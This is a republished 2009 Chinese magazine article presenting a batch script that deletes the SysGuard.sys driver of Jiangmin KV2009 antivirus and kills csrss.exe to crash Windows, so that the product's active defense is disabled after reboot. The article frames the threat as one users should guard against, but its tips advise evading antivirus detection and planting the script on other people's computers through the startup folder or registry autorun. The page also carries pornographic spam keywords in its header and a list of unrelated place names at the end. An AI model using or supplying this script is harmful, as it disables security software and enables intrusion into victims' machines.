• 
    

    
    

      99热精品在线国产_美女午夜性视频免费_国产精品国产高清国产av_av欧美777_自拍偷自拍亚洲精品老妇_亚洲熟女精品中文字幕_www日本黄色视频网_国产精品野战在线观看 ?

      批處理挑戰(zhàn)KV2009主動防御

      2009-04-29 00:44:03牧馬人
      計算機應(yīng)用文摘 2009年19期
      關(guān)鍵詞:主動防御批處理死機

      牧馬人

      現(xiàn)在主動防御功能實在是太火了,所以很多殺毒軟件都加入了這個功能,江民KV系列的殺毒軟件當然也不例外。但是,利用文本編輯軟件新建一個*.bat批處理文件,輸入下面這段代碼后保存并運行,就可以輕松干掉江民殺毒軟件KV2009的主動防御功能了(如圖)。

      @echo off

      del %systemroot%system32driversSysGuard.sys /f /q /s

      set app_name=csrss.exe

      echo 查找進程%app_name%,準備死機...

      (tasklist /nh | findstr /i %app_name%) || (goto dead)

      :dead

      ntsd -c -q -pn %app_name%

      我在虛擬機和本地系統(tǒng)中分別進行了試驗,發(fā)現(xiàn)這段代碼非常管用。它的意思非常簡單:首先是刪除江民殺毒軟件中的一個驅(qū)動文件,接著強制結(jié)束一個系統(tǒng)文件的進程,造成操作系統(tǒng)死機(之所以要強制死機,是因為殺毒軟件的自我保護功能不允許系統(tǒng)非正常地重新啟動)。當重新啟動后,江民殺毒軟件的主動防御功能就失效了,這樣黑客就能比較容易地向用戶的電腦中植入木馬、竊取賬號……

      如果你是江民殺毒軟件的用戶,那么此招不得不防,最好經(jīng)常檢查其主動防御功能的工作狀態(tài),不然電腦被黑客入侵了都還不知道。

      1.在試驗前,一定要把江民殺毒軟件的SysGuard.sys驅(qū)動文件拷貝到其他地方進行備份。因為如果試驗成功了,那么江民殺毒軟件的主動防御功能就徹底失效了,要想讓它恢復就得把備份的SysGuard.sys驅(qū)動文件拷貝回去,再重新啟動。

      2.最好不要把*.bat放在可執(zhí)行文件里,因為這樣在運行時十有八九會被殺毒軟件攔截。

      3.在別人的電腦上進行試驗時,可把*.bat放在啟動文件夾中,或采用修改注冊表的方式讓它自動運行。

      猜你喜歡
      主動防御批處理死機
      主動防御撞擊地球的“殺手”
      電腦死機時在干什么
      電腦報(2022年49期)2023-01-01 03:42:10
      提醒
      主動防御飛行器的范數(shù)型微分對策制導律
      網(wǎng)絡(luò)安全主動防御技術(shù)分析
      臉死機了
      基于PSD-BPA的暫態(tài)穩(wěn)定控制批處理計算方法的實現(xiàn)
      淺析HIPS系統(tǒng)防火墻技術(shù)與發(fā)展
      批處理天地.文件分類超輕松
      批處理天地.批量為文件更名(續(xù))
      雷州市| 介休市| 光山县| 涞源县| 锡林郭勒盟| 清涧县| 龙口市| 洪洞县| 鄂托克旗| 黄山市| 特克斯县| 灵寿县| 清苑县| 绥芬河市| 东台市| 遂溪县| 三原县| 泗阳县| 成都市| 和龙市| 高安市| 蒙山县| 西昌市| 历史| 东明县| 昭通市| 乐陵市| 通城县| 黄平县| 新干县| 泸西县| 永城市| 道孚县| 定兴县| 远安县| 原阳县| 桂平市| 罗田县| 伊春市| 于都县| 文成县|